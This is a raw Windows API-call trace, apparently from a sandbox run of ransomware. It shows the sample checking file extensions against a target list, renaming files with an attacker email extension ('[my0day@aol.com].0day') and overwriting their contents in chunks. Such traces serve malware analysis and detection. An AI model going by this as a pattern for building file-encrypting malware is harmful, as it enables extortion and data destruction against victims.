SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.837] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.837] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acees.dll.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0057.837] GetLastError () returned 0x0 [0057.837] ReadFile (hFile=0x234, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0) Thread: id = 16 os_tid = 0xad0 [0032.933] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10000) returned 0x3770f68 [0032.933] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10000) returned 0x3780f70 [0032.933] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x6403c8 [0032.933] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x6430c8 [0032.933] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x6403e0 [0032.933] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x100000) returned 0x3b70020 [0032.934] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x6403f8 [0032.934] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6403f8, Size=0x20) returned 0x37203a8 [0032.934] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x6403f8 [0032.934] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6403f8, Size=0x20) returned 0x3720380 [0032.934] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0032.934] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0032.934] Wow64DisableWow64FsRedirection (in: OldValue=0x326ff58 | out: OldValue=0x326ff58*=0x0) returned 1 [0032.934] lstrlenW (lpString="kernel32.dll") returned 12 [0032.934] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x37203a8 | out: hHeap=0x5f0000) returned 1 [0032.934] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0032.934] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3720380 | out: hHeap=0x5f0000) returned 1 [0032.934] Sleep (dwMilliseconds=0x64) [0033.103] lstrcmpiW (lpString1=".ttf", lpString2=".0day") returned 1 [0033.103] lstrlenW (lpString="kor_boot.ttf") returned 12 [0033.103] CreateFileW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0033.751] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x326ff1c | out: lpFileSize=0x326ff1c*=2371360) returned 1 [0033.752] CloseHandle (hObject=0x16c) returned 1 [0033.773] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf")) returned 0x20 [0033.773] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0033.773] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\kor_boot.ttf.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0033.773] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0033.773] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0033.773] lstrlenW (lpString=".doc") returned 4 [0033.773] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0033.773] lstrlenW (lpString=".docx") returned 5 [0033.773] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0033.773] lstrlenW (lpString=".pdf") returned 4 [0033.773] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0033.773] lstrlenW (lpString=".xls") returned 4 [0033.773] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0033.773] lstrlenW (lpString=".xlsx") returned 5 [0033.773] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0033.773] lstrlenW (lpString=".ppt") returned 4 [0033.773] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0033.773] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0033.773] lstrlenW (lpString=".zip") returned 4 [0033.773] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0033.773] lstrlenW (lpString=".rar") returned 4 [0033.773] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0033.773] lstrlenW (lpString=".bz2") returned 4 [0033.773] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0033.773] lstrlenW (lpString=".7z") returned 3 [0033.773] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0033.773] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0033.773] lstrlenW (lpString=".dbf") returned 4 [0033.773] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0033.773] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0033.774] lstrlenW (lpString=".1cd") returned 4 [0033.774] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0033.774] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0033.774] lstrlenW (lpString=".jpg") returned 4 [0033.774] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0033.774] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0033.774] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0033.774] lstrlenW (lpString=".doc") returned 4 [0033.774] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0033.774] lstrlenW (lpString=".docx") returned 5 [0033.774] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0033.774] lstrlenW (lpString=".pdf") returned 4 [0033.774] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0033.774] lstrlenW (lpString=".xls") returned 4 [0033.774] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0033.774] lstrlenW (lpString=".xlsx") returned 5 [0033.774] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0033.774] lstrlenW (lpString=".ppt") returned 4 [0033.774] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0033.774] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0033.774] lstrlenW (lpString=".zip") returned 4 [0033.774] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0033.774] lstrlenW (lpString=".rar") returned 4 [0033.774] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0033.774] lstrlenW (lpString=".bz2") returned 4 [0033.774] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0033.774] lstrlenW (lpString=".7z") returned 3 [0033.774] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0033.774] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0033.774] lstrlenW (lpString=".dbf") returned 4 [0033.774] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0033.774] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0033.774] lstrlenW (lpString=".1cd") returned 4 [0033.774] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0033.774] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0033.775] lstrlenW (lpString=".jpg") returned 4 [0033.775] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0033.775] lstrcmpiW (lpString1=".msi", lpString2=".0day") returned 1 [0033.775] lstrlenW (lpString="ExcelMUI.msi") returned 12 [0033.775] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0033.775] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x326ff1c | out: lpFileSize=0x326ff1c*=2506240) returned 1 [0033.775] CloseHandle (hObject=0x16c) returned 1 [0033.775] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi")) returned 0x2020 [0033.775] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0033.775] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0033.776] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0033.776] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fc6c | out: lpNewFilePointer=0x0) returned 1 [0033.776] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fc2c | out: lpNewFilePointer=0x0) returned 1 [0033.776] ReadFile (in: hFile=0x16c, lpBuffer=0x3b70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x326fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b70058*, lpNumberOfBytesRead=0x326fc38*=0x40000, lpOverlapped=0x0) returned 1 [0033.783] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xcbf55, lpNewFilePointer=0x0, dwMoveMethod=0x326fc2c | out: lpNewFilePointer=0x0) returned 1 [0033.783] ReadFile (in: hFile=0x16c, lpBuffer=0x3bb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x326fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bb0058*, lpNumberOfBytesRead=0x326fc38*=0x40000, lpOverlapped=0x0) returned 1 [0033.795] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x326fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0033.795] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x223e00, lpNewFilePointer=0x0, dwMoveMethod=0x326fc2c | out: lpNewFilePointer=0x0) returned 1 [0033.795] ReadFile (in: hFile=0x16c, lpBuffer=0x3bf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x326fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bf0058*, lpNumberOfBytesRead=0x326fc38*=0x40000, lpOverlapped=0x0) returned 1 [0033.813] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0033.813] WriteFile (in: hFile=0x16c, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x326fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0034.064] SetEndOfFile (hFile=0x16c) returned 1 [0034.064] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3ed3070 [0034.064] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fc7c | out: lpNewFilePointer=0x0) returned 1 [0034.064] WriteFile (in: hFile=0x16c, lpBuffer=0x3ed3070*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x326fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ed3070*, lpNumberOfBytesWritten=0x326fc88*=0x40000, lpOverlapped=0x0) returned 1 [0034.066] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xcbf55, lpNewFilePointer=0x0, dwMoveMethod=0x326fc7c | out: lpNewFilePointer=0x0) returned 1 [0034.066] WriteFile (in: hFile=0x16c, lpBuffer=0x3ed3070*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x326fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ed3070*, lpNumberOfBytesWritten=0x326fc88*=0x40000, lpOverlapped=0x0) returned 1 [0034.071] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x223e00, lpNewFilePointer=0x0, dwMoveMethod=0x326fc7c | out: lpNewFilePointer=0x0) returned 1 [0034.071] WriteFile (in: hFile=0x16c, lpBuffer=0x3ed3070*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x326fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ed3070*, lpNumberOfBytesWritten=0x326fc88*=0x40000, lpOverlapped=0x0) returned 1 [0034.074] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ed3070 | out: hHeap=0x5f0000) returned 1 [0034.074] CloseHandle (hObject=0x16c) returned 1 [0034.537] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0034.537] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0034.537] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0034.537] lstrlenW (lpString=".doc") returned 4 [0034.537] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0034.537] lstrlenW (lpString=".docx") returned 5 [0034.537] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0034.537] lstrlenW (lpString=".pdf") returned 4 [0034.537] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0034.537] lstrlenW (lpString=".xls") returned 4 [0034.537] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0034.537] lstrlenW (lpString=".xlsx") returned 5 [0034.538] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0034.538] lstrlenW (lpString=".ppt") returned 4 [0034.538] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0034.538] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0034.538] lstrlenW (lpString=".zip") returned 4 [0034.538] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0034.538] lstrlenW (lpString=".rar") returned 4 [0034.538] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0034.538] lstrlenW (lpString=".bz2") returned 4 [0034.538] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0034.538] lstrlenW (lpString=".7z") returned 3 [0034.538] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0034.538] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0034.538] lstrlenW (lpString=".dbf") returned 4 [0034.538] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0034.538] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0034.538] lstrlenW (lpString=".1cd") returned 4 [0034.538] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0034.538] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0034.538] lstrlenW (lpString=".jpg") returned 4 [0034.538] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0034.538] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0034.538] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0034.538] lstrlenW (lpString=".doc") returned 4 [0034.538] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0034.538] lstrlenW (lpString=".docx") returned 5 [0034.538] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0034.538] lstrlenW (lpString=".pdf") returned 4 [0034.538] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0034.538] lstrlenW (lpString=".xls") returned 4 [0034.538] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0034.538] lstrlenW (lpString=".xlsx") returned 5 [0034.538] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0034.538] lstrlenW (lpString=".ppt") returned 4 [0034.538] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0034.539] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0034.539] lstrlenW (lpString=".zip") returned 4 [0034.539] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0034.539] lstrlenW (lpString=".rar") returned 4 [0034.539] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0034.539] lstrlenW (lpString=".bz2") returned 4 [0034.539] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0034.539] lstrlenW (lpString=".7z") returned 3 [0034.539] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0034.539] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0034.539] lstrlenW (lpString=".dbf") returned 4 [0034.539] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0034.539] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0034.539] lstrlenW (lpString=".1cd") returned 4 [0034.539] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0034.539] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0034.539] lstrlenW (lpString=".jpg") returned 4 [0034.539] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0034.539] lstrcmpiW (lpString1=".msi", lpString2=".0day") returned 1 [0034.539] lstrlenW (lpString="PublisherMUI.msi") returned 16 [0034.539] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0034.540] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x326ff1c | out: lpFileSize=0x326ff1c*=2513920) returned 1 [0034.540] CloseHandle (hObject=0x16c) returned 1 [0034.540] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi")) returned 0x2020 [0034.540] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0034.540] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0034.541] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0034.541] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fc6c | out: lpNewFilePointer=0x0) returned 1 [0034.541] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fc2c | out: lpNewFilePointer=0x0) returned 1 [0034.541] ReadFile (in: hFile=0x16c, lpBuffer=0x3b70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x326fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b70058*, lpNumberOfBytesRead=0x326fc38*=0x40000, lpOverlapped=0x0) returned 1 [0034.618] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xcc955, lpNewFilePointer=0x0, dwMoveMethod=0x326fc2c | out: lpNewFilePointer=0x0) returned 1 [0034.618] ReadFile (in: hFile=0x16c, lpBuffer=0x3bb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x326fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bb0058*, lpNumberOfBytesRead=0x326fc38*=0x40000, lpOverlapped=0x0) returned 1 [0034.796] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x326fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0034.796] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x225c00, lpNewFilePointer=0x0, dwMoveMethod=0x326fc2c | out: lpNewFilePointer=0x0) returned 1 [0034.796] ReadFile (in: hFile=0x16c, lpBuffer=0x3bf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x326fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bf0058*, lpNumberOfBytesRead=0x326fc38*=0x40000, lpOverlapped=0x0) returned 1 [0034.812] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.812] WriteFile (in: hFile=0x16c, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xc010c, lpNumberOfBytesWritten=0x326fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fcb0*=0xc010c, lpOverlapped=0x0) returned 1 [0035.036] SetEndOfFile (hFile=0x16c) returned 1 [0035.036] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3f2a098 [0035.040] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fc7c | out: lpNewFilePointer=0x0) returned 1 [0035.040] WriteFile (in: hFile=0x16c, lpBuffer=0x3f2a098*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x326fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f2a098*, lpNumberOfBytesWritten=0x326fc88*=0x40000, lpOverlapped=0x0) returned 1 [0035.631] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xcc955, lpNewFilePointer=0x0, dwMoveMethod=0x326fc7c | out: lpNewFilePointer=0x0) returned 1 [0035.631] WriteFile (in: hFile=0x16c, lpBuffer=0x3f2a098*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x326fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f2a098*, lpNumberOfBytesWritten=0x326fc88*=0x40000, lpOverlapped=0x0) returned 1 [0035.637] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x225c00, lpNewFilePointer=0x0, dwMoveMethod=0x326fc7c | out: lpNewFilePointer=0x0) returned 1 [0035.637] WriteFile (in: hFile=0x16c, lpBuffer=0x3f2a098*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x326fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f2a098*, lpNumberOfBytesWritten=0x326fc88*=0x40000, lpOverlapped=0x0) returned 1 [0035.640] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3f2a098 | out: hHeap=0x5f0000) returned 1 [0035.641] CloseHandle (hObject=0x16c) returned 1 [0036.173] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0036.173] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0036.173] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0036.173] lstrlenW (lpString=".doc") returned 4 [0036.173] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0036.173] lstrlenW (lpString=".docx") returned 5 [0036.173] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0036.173] lstrlenW (lpString=".pdf") returned 4 [0036.173] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0036.173] lstrlenW (lpString=".xls") returned 4 [0036.173] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0036.173] lstrlenW (lpString=".xlsx") returned 5 [0036.173] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0036.173] lstrlenW (lpString=".ppt") returned 4 [0036.173] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0036.173] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0036.173] lstrlenW (lpString=".zip") returned 4 [0036.173] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0036.173] lstrlenW (lpString=".rar") returned 4 [0036.173] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0036.173] lstrlenW (lpString=".bz2") returned 4 [0036.173] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0036.173] lstrlenW (lpString=".7z") returned 3 [0036.173] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0036.174] lstrlenW (lpString="C:\\MSOCache\\All 